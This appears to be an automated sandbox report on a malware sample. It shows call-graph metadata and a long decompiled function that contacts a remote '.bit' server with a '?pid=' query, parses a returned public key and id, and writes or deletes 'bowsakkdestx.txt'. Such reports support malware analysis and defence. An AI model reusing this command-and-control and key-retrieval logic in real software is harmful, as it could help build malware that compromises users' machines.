                                                                                      • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                      • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                      • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                      • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                                                    • String ID:
                                                                                    • API String ID: 3712619029-0
                                                                                    • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                    • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                    • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                    • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 70%
                                                                                    			E0041E690(void* __ecx, intOrPtr __edx, char _a4, char _a8, char _a16, char _a256, char _a264, char _a268, char _a272, void _a296, char _a360, char _a361, char _a1292, char _a1296, short _a2368, signed int _a22780, char _a22800, intOrPtr _a22804, int _a22812, char _a22856, intOrPtr _a22880) {
                                                                                    				short _v0;
                                                                                    				char _v4;
                                                                                    				short _v8;
                                                                                    				char _v12;
                                                                                    				char _v14;
                                                                                    				char _v15;
                                                                                    				char _v16;
                                                                                    				char _v20;
                                                                                    				char _v24;
                                                                                    				short _v28;
                                                                                    				char _v32;
                                                                                    				WCHAR* _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				char _v45;
                                                                                    				WCHAR* _v48;
                                                                                    				char _v52;
                                                                                    				char _v54;
                                                                                    				intOrPtr _v57;
                                                                                    				char _v60;
                                                                                    				char _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				char _v72;
                                                                                    				long _v76;
                                                                                    				intOrPtr _v84;
                                                                                    				intOrPtr _v88;
                                                                                    				signed int _v92;
                                                                                    				char _v96;
                                                                                    				WCHAR* _v100;
                                                                                    				char _v101;
                                                                                    				intOrPtr _v103;
                                                                                    				signed int _v104;
                                                                                    				intOrPtr _v107;
                                                                                    				signed int _v108;
                                                                                    				intOrPtr _v109;
                                                                                    				char _v111;
                                                                                    				char _v122;
                                                                                    				intOrPtr _v134;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int _t219;
                                                                                    				signed int _t223;
                                                                                    				void* _t227;
                                                                                    				void* _t241;
                                                                                    				signed int _t250;
                                                                                    				signed int _t251;
                                                                                    				WCHAR* _t254;
                                                                                    				signed int _t265;
                                                                                    				int _t266;
                                                                                    				signed int _t274;
                                                                                    				signed int _t275;
                                                                                    				WCHAR* _t278;
                                                                                    				signed int _t288;
                                                                                    				signed int _t291;
                                                                                    				signed int _t294;
                                                                                    				WCHAR* _t298;
                                                                                    				WCHAR* _t303;
                                                                                    				signed int _t313;
                                                                                    				signed int _t318;
                                                                                    				int _t321;
                                                                                    				signed int _t322;
                                                                                    				int _t329;
                                                                                    				char* _t330;
                                                                                    				signed int _t336;
                                                                                    				WCHAR* _t346;
                                                                                    				signed int _t361;
                                                                                    				char _t367;
                                                                                    				void* _t368;
                                                                                    				WCHAR* _t369;
                                                                                    				WCHAR* _t373;
                                                                                    				WCHAR* _t374;
                                                                                    				signed int _t375;
                                                                                    				char _t377;
                                                                                    				signed int* _t381;
                                                                                    				signed int _t382;
                                                                                    				signed int _t383;
                                                                                    				char* _t386;
                                                                                    				intOrPtr* _t389;
                                                                                    				signed int _t390;
                                                                                    				intOrPtr* _t397;
                                                                                    				signed int _t398;
                                                                                    				intOrPtr* _t403;
                                                                                    				signed int _t404;
                                                                                    				intOrPtr* _t407;
                                                                                    				signed int _t408;
                                                                                    				char* _t410;
                                                                                    				char* _t412;
                                                                                    				short* _t415;
                                                                                    				signed int* _t418;
                                                                                    				char* _t419;
                                                                                    				char* _t421;
                                                                                    				intOrPtr* _t423;
                                                                                    				intOrPtr* _t425;
                                                                                    				void* _t429;
                                                                                    				char _t430;
                                                                                    				void* _t431;
                                                                                    				WCHAR* _t432;
                                                                                    				void* _t433;
                                                                                    				WCHAR* _t434;
                                                                                    				char _t435;
                                                                                    				void* _t439;
                                                                                    				unsigned int _t440;
                                                                                    				signed int _t442;
                                                                                    				void* _t443;
                                                                                    				unsigned int _t444;
                                                                                    				signed int _t447;
                                                                                    				signed int _t448;
                                                                                    				signed int _t451;
                                                                                    				signed int _t452;
                                                                                    				signed int _t453;
                                                                                    				void* _t454;
                                                                                    				void* _t455;
                                                                                    				void* _t456;
                                                                                    				char* _t457;
                                                                                    				char* _t458;
                                                                                    				void* _t459;
                                                                                    				char* _t462;
                                                                                    				void* _t463;
                                                                                    				void* _t465;
                                                                                    				void* _t466;
                                                                                    				char* _t467;
                                                                                    				void* _t468;
                                                                                    				char* _t469;
                                                                                    				void* _t470;
                                                                                    				short* _t472;
                                                                                    
                                                                                    				_t417 = __edx;
                                                                                    				_t453 = _t452 & 0xfffffff8;
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4cb3ec);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t453;
                                                                                    				_push(__ecx);
                                                                                    				E0042F7C0(0x597c);
                                                                                    				_t367 = _a4;
                                                                                    				_push(_t437);
                                                                                    				 *((char*)(_t367 + 4)) = 1;
                                                                                    				E00423F74(timeGetTime());
                                                                                    				_t454 = _t453 + 4;
                                                                                    				_v14 = E0040C6A0();
                                                                                    				_v8 = 4;
                                                                                    				while(1) {
                                                                                    					_t429 = lstrlenA;
                                                                                    					do {
                                                                                    						do {
                                                                                    							while(1) {
                                                                                    								L2:
                                                                                    								_a360 = 0;
                                                                                    								E0042B420( &_a361, 0, 0x3ff);
                                                                                    								_t455 = _t454 + 0xc;
                                                                                    								_v15 = 0;
                                                                                    								if(E0040C500( &_a360, _t417) == 0) {
                                                                                    									goto L4;
                                                                                    								} else {
                                                                                    									_v15 = 1;
                                                                                    								}
                                                                                    								L35:
                                                                                    								_v100 = 0;
                                                                                    								_t437 = 0;
                                                                                    								_t241 = E00423CF0( &_a272, "{\"public_key\":\"");
                                                                                    								_t454 = _t455 + 8;
                                                                                    								if(_t241 != 0) {
                                                                                    									lstrcpyA( &_a1296, _t454 + lstrlenA("{\"public_key\":\"") + 0x188);
                                                                                    									lstrcpyA( &_a272,  &_a1296);
                                                                                    									_t250 = lstrlenA( &_a272);
                                                                                    									__eflags = _t250;
                                                                                    									if(_t250 <= 0) {
                                                                                    										L45:
                                                                                    										_t458 = _t454 - 0x18;
                                                                                    										_v101 = 0;
                                                                                    										_t419 = _t458;
                                                                                    										 *(_t419 + 0x14) = 0xf;
                                                                                    										 *(_t419 + 0x10) = 0;
                                                                                    										 *_t419 = 0;
                                                                                    										__eflags = _a272;
                                                                                    										if(_a272 != 0) {
                                                                                    											_t389 =  &_a272;
                                                                                    											_t97 = _t389 + 1; // 0x1
                                                                                    											_t439 = _t97;
                                                                                    											do {
                                                                                    												_t251 =  *_t389;
                                                                                    												_t389 = _t389 + 1;
                                                                                    												__eflags = _t251;
                                                                                    											} while (_t251 != 0);
                                                                                    											_t390 = _t389 - _t439;
                                                                                    											__eflags = _t390;
                                                                                    											L50:
                                                                                    											_push(_t390);
                                                                                    											E004156D0(_t367, _t419, _t429,  &_a272);
                                                                                    											_t420 = _v109;
                                                                                    											_t254 = E00412900( &_v72, _v109);
                                                                                    											_t459 = _t458 + 0x18;
                                                                                    											__eflags = _t254[0xa] - 8;
                                                                                    											if(_t254[0xa] >= 8) {
                                                                                    												_t254 =  *_t254;
                                                                                    											}
                                                                                    											_t369 = _t367 + 0x7550;
                                                                                    											lstrcpyW(_t369, _t254);
                                                                                    											__eflags = _v48 - 8;
                                                                                    											if(_v48 >= 8) {
                                                                                    												L00422587(_v68);
                                                                                    												_t459 = _t459 + 4;
                                                                                    											}
                                                                                    											_t440 = 2 + lstrlenA( &_a268) * 2;
                                                                                    											_t432 = E00420C62(_t369, _t420, _t429, _t440);
                                                                                    											E0042B420(_t432, 0, _t440);
                                                                                    											_t437 = _t440 >> 1;
                                                                                    											MultiByteToWideChar(0, 0,  &_a268, 0xffffffff, _t432, _t440 >> 1);
                                                                                    											lstrcpyW(_t369, _t432);
                                                                                    											_t417 = 0;
                                                                                    											 *((short*)(_a4 + 0x7550 + _v104 * 2)) = 0;
                                                                                    											_t265 = E00423CF0( &_a268, "\",\"id\":\"");
                                                                                    											_t454 = _t459 + 0x18;
                                                                                    											__eflags = _t265;
                                                                                    											if(_t265 != 0) {
                                                                                    												_t266 = lstrlenW(_t369);
                                                                                    												_t433 = lstrlenA;
                                                                                    												lstrcpyA( &_a1292,  &(( &(( &_a268)[lstrlenA("\",\"id\":\"")]))[_t266]));
                                                                                    												lstrcpyA( &_a268,  &_a1292);
                                                                                    												_v104 = 0;
                                                                                    												_t442 = 0;
                                                                                    												_t274 = lstrlenA( &_a268);
                                                                                    												__eflags = _t274;
                                                                                    												if(_t274 <= 0) {
                                                                                    													L64:
                                                                                    													_t462 = _t454 - 0x18;
                                                                                    													_t421 = _t462;
                                                                                    													 *(_t421 + 0x14) = 0xf;
                                                                                    													 *(_t421 + 0x10) = 0;
                                                                                    													 *_t421 = 0;
                                                                                    													__eflags = _a268;
                                                                                    													if(_a268 != 0) {
                                                                                    														_t397 =  &_a268;
                                                                                    														_t443 = _t397 + 1;
                                                                                    														do {
                                                                                    															_t275 =  *_t397;
                                                                                    															_t397 = _t397 + 1;
                                                                                    															__eflags = _t275;
                                                                                    														} while (_t275 != 0);
                                                                                    														_t398 = _t397 - _t443;
                                                                                    														__eflags = _t398;
                                                                                    														L69:
                                                                                    														_push(_t398);
                                                                                    														E004156D0(0, _t421, _t433,  &_a268);
                                                                                    														_t417 = 0;
                                                                                    														_t278 = E00412900( &_v76, 0);
                                                                                    														_t463 = _t462 + 0x18;
                                                                                    														__eflags = _t278[0xa] - 8;
                                                                                    														if(_t278[0xa] >= 8) {
                                                                                    															_t278 =  *_t278;
                                                                                    														}
                                                                                    														_t373 = _a4 + 0xea80;
                                                                                    														lstrcpyW(_t373, _t278);
                                                                                    														__eflags = _v52 - 8;
                                                                                    														if(_v52 >= 8) {
                                                                                    															L00422587(_v72);
                                                                                    															_t463 = _t463 + 4;
                                                                                    														}
                                                                                    														_t444 = 2 + lstrlenA( &_a264) * 2;
                                                                                    														_t434 = E00420C62(_t373, _t417, _t433, _t444);
                                                                                    														E0042B420(_t434, 0, _t444);
                                                                                    														_t454 = _t463 + 0x10;
                                                                                    														MultiByteToWideChar(0, 0,  &_a264, 0xffffffff, _t434, _t444 >> 1);
                                                                                    														lstrcpyW(_t373, _t434);
                                                                                    														_t435 = _a4;
                                                                                    														_t437 = _t435 + 0x7550;
                                                                                    														 *((short*)(_t435 + 0xea80 + _v108 * 2)) = 0;
                                                                                    														_t288 = lstrlenW(_t437);
                                                                                    														__eflags = _t288;
                                                                                    														if(_t288 <= 0) {
                                                                                    															L75:
                                                                                    															__eflags = _v111;
                                                                                    															if(_v111 == 0) {
                                                                                    																__eflags = _t437;
                                                                                    																if(_t437 != 0) {
                                                                                    																	E00420BED(_t437);
                                                                                    																	_t454 = _t454 + 4;
                                                                                    																}
                                                                                    																__eflags = _t373;
                                                                                    																if(_t373 != 0) {
                                                                                    																	E00420BED(_t373);
                                                                                    																	_t454 = _t454 + 4;
                                                                                    																}
                                                                                    																goto L82;
                                                                                    															}
                                                                                    															goto L76;
                                                                                    														} else {
                                                                                    															_t318 = lstrlenW(_t373);
                                                                                    															__eflags = _t318;
                                                                                    															if(_t318 != 0) {
                                                                                    																 *((char*)(_t435 + 4)) = 0;
                                                                                    																goto L112;
                                                                                    															}
                                                                                    															goto L75;
                                                                                    														}
                                                                                    													}
                                                                                    													_t398 = 0;
                                                                                    													goto L69;
                                                                                    												}
                                                                                    												while(1) {
                                                                                    													__eflags =  *((char*)(_t454 + _t442 + 0x188)) - 0x22;
                                                                                    													if( *((char*)(_t454 + _t442 + 0x188)) == 0x22) {
                                                                                    														break;
                                                                                    													}
                                                                                    													_t442 = _t442 + 1;
                                                                                    													_t321 = lstrlenA( &_a268);
                                                                                    													__eflags = _t442 - _t321;
                                                                                    													if(_t442 < _t321) {
                                                                                    														continue;
                                                                                    													}
                                                                                    													goto L64;
                                                                                    												}
                                                                                    												_v104 = _t442;
                                                                                    												goto L64;
                                                                                    											} else {
                                                                                    												__eflags = _v107 - _t265;
                                                                                    												if(_v107 == _t265) {
                                                                                    													L82:
                                                                                    													E00411B10();
                                                                                    													_t437 = _v104 - 1;
                                                                                    													_v104 = _t437;
                                                                                    													__eflags = _t437;
                                                                                    													if(__eflags <= 0) {
                                                                                    														E0040EF50(0x510020,  &_v104, __eflags, 0x10);
                                                                                    														_t465 = _t454 + 4;
                                                                                    														_v4 = 0xf;
                                                                                    														_v8 = 0;
                                                                                    														_v24 = 0;
                                                                                    														_a22804 = 2;
                                                                                    														_t447 = 0;
                                                                                    														__eflags = 0;
                                                                                    														_t374 = _v104;
                                                                                    														do {
                                                                                    															_t423 =  *((intOrPtr*)(_t374 + _t447 * 4));
                                                                                    															__eflags =  *_t423;
                                                                                    															if( *_t423 != 0) {
                                                                                    																_t403 = _t423;
                                                                                    																_t435 = _t403 + 1;
                                                                                    																do {
                                                                                    																	_t291 =  *_t403;
                                                                                    																	_t403 = _t403 + 1;
                                                                                    																	__eflags = _t291;
                                                                                    																} while (_t291 != 0);
                                                                                    																_t404 = _t403 - _t435;
                                                                                    																__eflags = _t404;
                                                                                    																goto L91;
                                                                                    															}
                                                                                    															_t404 = 0;
                                                                                    															L91:
                                                                                    															_push(_t404);
                                                                                    															E00413EA0(_t374,  &_v24, _t435, _t447, _t423);
                                                                                    															_t447 = _t447 + 1;
                                                                                    															__eflags = _t447 - 0x10;
                                                                                    														} while (__eflags < 0);
                                                                                    														E0040EF50(0x510060,  &_v108, __eflags, 0x10);
                                                                                    														_t466 = _t465 + 4;
                                                                                    														_v32 = 0xf;
                                                                                    														_v36 = 0;
                                                                                    														_v52 = 0;
                                                                                    														_a22800 = 3;
                                                                                    														_t448 = 0;
                                                                                    														__eflags = 0;
                                                                                    														_t375 = _v108;
                                                                                    														do {
                                                                                    															_t425 =  *((intOrPtr*)(_t375 + _t448 * 4));
                                                                                    															__eflags =  *_t425;
                                                                                    															if( *_t425 != 0) {
                                                                                    																_t407 = _t425;
                                                                                    																_t435 = _t407 + 1;
                                                                                    																do {
                                                                                    																	_t294 =  *_t407;
                                                                                    																	_t407 = _t407 + 1;
                                                                                    																	__eflags = _t294;
                                                                                    																} while (_t294 != 0);
                                                                                    																_t408 = _t407 - _t435;
                                                                                    																__eflags = _t408;
                                                                                    																goto L98;
                                                                                    															}
                                                                                    															_t408 = 0;
                                                                                    															L98:
                                                                                    															_push(_t408);
                                                                                    															E00413EA0(_t375,  &_v52, _t435, _t448, _t425);
                                                                                    															_t448 = _t448 + 1;
                                                                                    															__eflags = _t448 - 0x10;
                                                                                    														} while (_t448 < 0x10);
                                                                                    														_t467 = _t466 - 0x18;
                                                                                    														_t410 = _t467;
                                                                                    														_push(0xffffffff);
                                                                                    														 *(_t410 + 0x14) = 0xf;
                                                                                    														 *(_t410 + 0x10) = 0;
                                                                                    														 *_t410 = 0;
                                                                                    														E00413FF0(0, _t410,  &_v32, 0);
                                                                                    														_t298 = E00412900( &_v92, 0);
                                                                                    														_t468 = _t467 + 0x18;
                                                                                    														__eflags = _t298[0xa] - 8;
                                                                                    														if(_t298[0xa] >= 8) {
                                                                                    															_t298 =  *_t298;
                                                                                    														}
                                                                                    														_t377 = _a4;
                                                                                    														lstrcpyW(_t377 + 0x7550, _t298);
                                                                                    														__eflags = _v64 - 8;
                                                                                    														if(_v64 >= 8) {
                                                                                    															L00422587(_v84);
                                                                                    															_t468 = _t468 + 4;
                                                                                    														}
                                                                                    														_t469 = _t468 - 0x18;
                                                                                    														_v122 = 0;
                                                                                    														_t412 = _t469;
                                                                                    														_push(0xffffffff);
                                                                                    														 *(_t412 + 0x14) = 0xf;
                                                                                    														 *(_t412 + 0x10) = 0;
                                                                                    														 *_t412 = 0;
                                                                                    														E00413FF0(_t377, _t412,  &_v60, 0);
                                                                                    														_t303 = E00412900( &_v96, _v134);
                                                                                    														_t470 = _t469 + 0x18;
                                                                                    														__eflags = _t303[0xa] - 8;
                                                                                    														if(_t303[0xa] >= 8) {
                                                                                    															_t303 =  *_t303;
                                                                                    														}
                                                                                    														lstrcpyW(_t377 + 0xea80, _t303);
                                                                                    														__eflags = _v68 - 8;
                                                                                    														if(_v68 >= 8) {
                                                                                    															L00422587(_v88);
                                                                                    															_t470 = _t470 + 4;
                                                                                    														}
                                                                                    														__eflags = _v44 - 0x10;
                                                                                    														 *((char*)(_t377 + 0x15fb7)) = 1;
                                                                                    														if(_v44 >= 0x10) {
                                                                                    															L00422587(_v64);
                                                                                    															_t470 = _t470 + 4;
                                                                                    														}
                                                                                    														__eflags = _v20 - 0x10;
                                                                                    														_v44 = 0xf;
                                                                                    														_v48 = 0;
                                                                                    														_v64 = 0;
                                                                                    														if(_v20 >= 0x10) {
                                                                                    															L00422587(_v40);
                                                                                    														}
                                                                                    														 *((char*)(_t377 + 4)) = 0;
                                                                                    														L112:
                                                                                    														__eflags = 0;
                                                                                    														 *[fs:0x0] = _a22780;
                                                                                    														return 0;
                                                                                    													}
                                                                                    													_t367 = _a4;
                                                                                    													while(1) {
                                                                                    														_t429 = lstrlenA;
                                                                                    														L2:
                                                                                    														_a360 = 0;
                                                                                    														E0042B420( &_a361, 0, 0x3ff);
                                                                                    														_t455 = _t454 + 0xc;
                                                                                    														_v15 = 0;
                                                                                    														if(E0040C500( &_a360, _t417) == 0) {
                                                                                    															goto L4;
                                                                                    														} else {
                                                                                    															_v15 = 1;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    												break;
                                                                                    											}
                                                                                    										}
                                                                                    										_t390 = 0;
                                                                                    										goto L50;
                                                                                    									}
                                                                                    									while(1) {
                                                                                    										__eflags =  *((char*)(_t454 +  &(_t437[0xc4]))) - 0x22;
                                                                                    										if( *((char*)(_t454 +  &(_t437[0xc4]))) == 0x22) {
                                                                                    											break;
                                                                                    										}
                                                                                    										_t437 =  &(_t437[0]);
                                                                                    										_t329 = lstrlenA( &_a272);
                                                                                    										__eflags = _t437 - _t329;
                                                                                    										if(_t437 < _t329) {
                                                                                    											continue;
                                                                                    										}
                                                                                    										goto L45;
                                                                                    									}
                                                                                    									_v100 = _t437;
                                                                                    									goto L45;
                                                                                    								}
                                                                                    								if(_v103 == _t241) {
                                                                                    									goto L82;
                                                                                    								}
                                                                                    								_t330 =  &_a8;
                                                                                    								__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t330);
                                                                                    								if(_t330 >= 0) {
                                                                                    									PathAppendA( &_v12, "bowsakkdestx.txt");
                                                                                    									DeleteFileA( &_v16);
                                                                                    								}
                                                                                    								continue;
                                                                                    								L4:
                                                                                    								_v12 = 0;
                                                                                    								_t368 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0);
                                                                                    								_v0 = 7;
                                                                                    								_v4 = 0;
                                                                                    								_v20 = 0;
                                                                                    								_t430 = _a4;
                                                                                    								_t418 = _t430 + 0x20;
                                                                                    								_a22880 = 0;
                                                                                    								__eflags =  *_t418;
                                                                                    								if( *_t418 != 0) {
                                                                                    									_t381 = _t418;
                                                                                    									_t437 =  &(_t381[0]);
                                                                                    									goto L7;
                                                                                    									L7:
                                                                                    									_t219 =  *_t381;
                                                                                    									_t381 =  &(_t381[0]);
                                                                                    									__eflags = _t219;
                                                                                    									if(_t219 != 0) {
                                                                                    										goto L7;
                                                                                    									} else {
                                                                                    										_t382 = _t381 - _t437;
                                                                                    										__eflags = _t382;
                                                                                    										_t383 = _t382 >> 1;
                                                                                    										goto L9;
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t383 = 0;
                                                                                    									L9:
                                                                                    									_push(_t383);
                                                                                    									E00415AE0(_t368,  &_v20, _t430, _t437, _t418);
                                                                                    									__eflags = _v8 - 8;
                                                                                    									_push(L".bit/");
                                                                                    									_t222 =  >=  ? _v28 :  &_v28;
                                                                                    									_push( >=  ? _v28 :  &_v28);
                                                                                    									_t223 = E00421C02( &_v20);
                                                                                    									_t456 = _t455 + 8;
                                                                                    									__eflags = _t223;
                                                                                    									if(_t223 != 0) {
                                                                                    										_t472 = _t456 - 0x18;
                                                                                    										_t415 = _t472;
                                                                                    										_push(0xffffffff);
                                                                                    										 *(_t415 + 0x14) = 7;
                                                                                    										 *(_t415 + 0x10) = 0;
                                                                                    										 *_t415 = 0;
                                                                                    										E00414690(_t368, _t415,  &_v24, 0);
                                                                                    										_t437 = E0040DD40( &_v12);
                                                                                    										_t456 = _t472 + 0x18;
                                                                                    										__eflags =  &_v36 - _t437;
                                                                                    										if( &_v36 != _t437) {
                                                                                    											_v8 = 7;
                                                                                    											_v12 = 0;
                                                                                    											_v28 = 0;
                                                                                    											__eflags = _t437[0xa] - 8;
                                                                                    											if(_t437[0xa] >= 8) {
                                                                                    												_v28 =  *_t437;
                                                                                    												 *_t437 = 0;
                                                                                    											} else {
                                                                                    												_t361 = _t437[8] + 1;
                                                                                    												__eflags = _t361;
                                                                                    												if(_t361 != 0) {
                                                                                    													E004205A0( &_v28, _t437, _t361 + _t361);
                                                                                    													_t456 = _t456 + 0xc;
                                                                                    												}
                                                                                    											}
                                                                                    											_v12 = _t437[8];
                                                                                    											_v8 = _t437[0xa];
                                                                                    											__eflags = 0;
                                                                                    											_t437[0xa] = 7;
                                                                                    											_t437[8] = 0;
                                                                                    											 *_t437 = 0;
                                                                                    										}
                                                                                    										__eflags = _a16 - 8;
                                                                                    										if(_a16 >= 8) {
                                                                                    											L00422587(_v4);
                                                                                    											_t456 = _t456 + 4;
                                                                                    										}
                                                                                    									}
                                                                                    									_push(5);
                                                                                    									E00415AE0(_t368,  &_v24, _t430, _t437, L"?pid=");
                                                                                    									_t457 = _t456 - 0x18;
                                                                                    									_v45 = 0;
                                                                                    									_t386 = _t457;
                                                                                    									_push(0xffffffff);
                                                                                    									 *(_t386 + 0x14) = 0xf;
                                                                                    									 *(_t386 + 0x10) = 0;
                                                                                    									 *_t386 = 0;
                                                                                    									E00413FF0(_t368, _t386, _t430 + 8, 0);
                                                                                    									_t417 = _v57;
                                                                                    									_t227 = E00412900( &_v20, _v57);
                                                                                    									_t455 = _t457 + 0x18;
                                                                                    									_push(0xffffffff);
                                                                                    									_push(0);
                                                                                    									_a22856 = 1;
                                                                                    									L004159D0(_t368,  &_v44, _t430, _t437, _t227);
                                                                                    									__eflags = _v12 - 8;
                                                                                    									if(_v12 >= 8) {
                                                                                    										L00422587(_v16);
                                                                                    										_t455 = _t455 + 4;
                                                                                    									}
                                                                                    									__eflags = _v20 - 8;
                                                                                    									_t230 =  >=  ? _v40 :  &_v40;
                                                                                    									lstrcpyW( &_a2368,  >=  ? _v40 :  &_v40);
                                                                                    									__eflags =  *((char*)(_t430 + 0x15fb5));
                                                                                    									if( *((char*)(_t430 + 0x15fb5)) == 0) {
                                                                                    										__eflags =  *((char*)(_t430 + 0x15fb6));
                                                                                    										if( *((char*)(_t430 + 0x15fb6)) == 0) {
                                                                                    											__eflags = _v54;
                                                                                    											_t346 =  &_a2368;
                                                                                    											if(_v54 == 0) {
                                                                                    												_push(L"&first=false");
                                                                                    											} else {
                                                                                    												_push(L"&first=true");
                                                                                    											}
                                                                                    											lstrcatW(_t346, ??);
                                                                                    										}
                                                                                    									}
                                                                                    									_t431 = InternetOpenUrlW(_t368,  &_a2368, 0, 0, 0, 0);
                                                                                    									InternetReadFile(_t431,  &_a296, 0x400,  &_v76);
                                                                                    									__eflags = _v92;
                                                                                    									if(_v92 > 0) {
                                                                                    										_t336 =  &_a16;
                                                                                    										__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t336);
                                                                                    										__eflags = _t336;
                                                                                    										if(_t336 >= 0) {
                                                                                    											PathAppendA( &_v4, "bowsakkdestx.txt");
                                                                                    											_t451 = E004220B6( &_v8, "w");
                                                                                    											_t455 = _t455 + 8;
                                                                                    											__eflags = _t451;
                                                                                    											if(__eflags != 0) {
                                                                                    												_push(_t451);
                                                                                    												_push(lstrlenA( &_a256));
                                                                                    												_push(1);
                                                                                    												_push( &_a256);
                                                                                    												E00422B02(_t368, _t417, _t431, _t451, __eflags);
                                                                                    												_push(_t451);
                                                                                    												E00423A38(_t368, _t431, _t451, __eflags);
                                                                                    												_t455 = _t455 + 0x14;
                                                                                    											}
                                                                                    										}
                                                                                    									}
                                                                                    									InternetCloseHandle(_t431);
                                                                                    									InternetCloseHandle(_t368);
                                                                                    									_a22812 = 0xffffffff;
                                                                                    									__eflags = _v68 - 8;
                                                                                    									if(_v68 >= 8) {
                                                                                    										L00422587(_v88);
                                                                                    										_t455 = _t455 + 4;
                                                                                    									}
                                                                                    									_t367 = _a4;
                                                                                    									_t429 = lstrlenA;
                                                                                    									goto L35;
                                                                                    								}
                                                                                    							}
                                                                                    							_t322 =  &_a4;
                                                                                    							__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t322);
                                                                                    							_t429 = lstrlenA;
                                                                                    							_t367 = _a4;
                                                                                    							__eflags = _t322;
                                                                                    						} while (_t322 < 0);
                                                                                    						PathAppendA( &_v16, "bowsakkdestx.txt");
                                                                                    						DeleteFileA( &_v20);
                                                                                    						while(1) {
                                                                                    							_t429 = lstrlenA;
                                                                                    							goto L2;
                                                                                    						}
                                                                                    						L76:
                                                                                    						_t313 =  &_v0;
                                                                                    						__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t313);
                                                                                    						_t429 = lstrlenA;
                                                                                    						_t367 = _a4;
                                                                                    						__eflags = _t313;
                                                                                    					} while (_t313 < 0);
                                                                                    					PathAppendA( &_v20, "bowsakkdestx.txt");
                                                                                    					DeleteFileA( &_v24);
                                                                                    				}
                                                                                    			}

                                                                                    0x0041ee1d
                                                                                    0x0041ee1f
                                                                                    0x0041ee22
                                                                                    0x0041ee27
                                                                                    0x0041ee27
                                                                                    0x00000000
                                                                                    0x0041ee1f
                                                                                    0x00000000
                                                                                    0x0041edad
                                                                                    0x0041edae
                                                                                    0x0041edb4
                                                                                    0x0041edb6
                                                                                    0x0041ee44
                                                                                    0x00000000
                                                                                    0x0041ee44
                                                                                    0x00000000
                                                                                    0x0041edb6
                                                                                    0x0041edab
                                                                                    0x0041ecdf
                                                                                    0x00000000
                                                                                    0x0041ecdf
                                                                                    0x0041eca0
                                                                                    0x0041eca0
                                                                                    0x0041eca8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0041ecb1
                                                                                    0x0041ecb3
                                                                                    0x0041ecb5
                                                                                    0x0041ecb7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0041ecb9
                                                                                    0x0041ecbb
                                                                                    0x00000000
                                                                                    0x0041ebe6
                                                                                    0x0041ebe6
                                                                                    0x0041ebea
                                                                                    0x0041ee2a
                                                                                    0x0041ee2a
                                                                                    0x0041ee33
                                                                                    0x0041ee34
                                                                                    0x0041ee38
                                                                                    0x0041ee3a
                                                                                    0x0041ee58
                                                                                    0x0041ee5d
                                                                                    0x0041ee60
                                                                                    0x0041ee68
                                                                                    0x0041ee70
                                                                                    0x0041ee75
                                                                                    0x0041ee80
                                                                                    0x0041ee80
                                                                                    0x0041ee82
                                                                                    0x0041ee86
                                                                                    0x0041ee86
                                                                                    0x0041ee89
                                                                                    0x0041ee8c
                                                                                    0x0041ee92
                                                                                    0x0041ee94
                                                                                    0x0041ee97
                                                                                    0x0041ee97
                                                                                    0x0041ee99
                                                                                    0x0041ee9a
                                                                                    0x0041ee9a
                                                                                    0x0041ee9e
                                                                                    0x0041ee9e
                                                                                    0x00000000
                                                                                    0x0041ee9e
                                                                                    0x0041ee8e
                                                                                    0x0041eea0
                                                                                    0x0041eea0
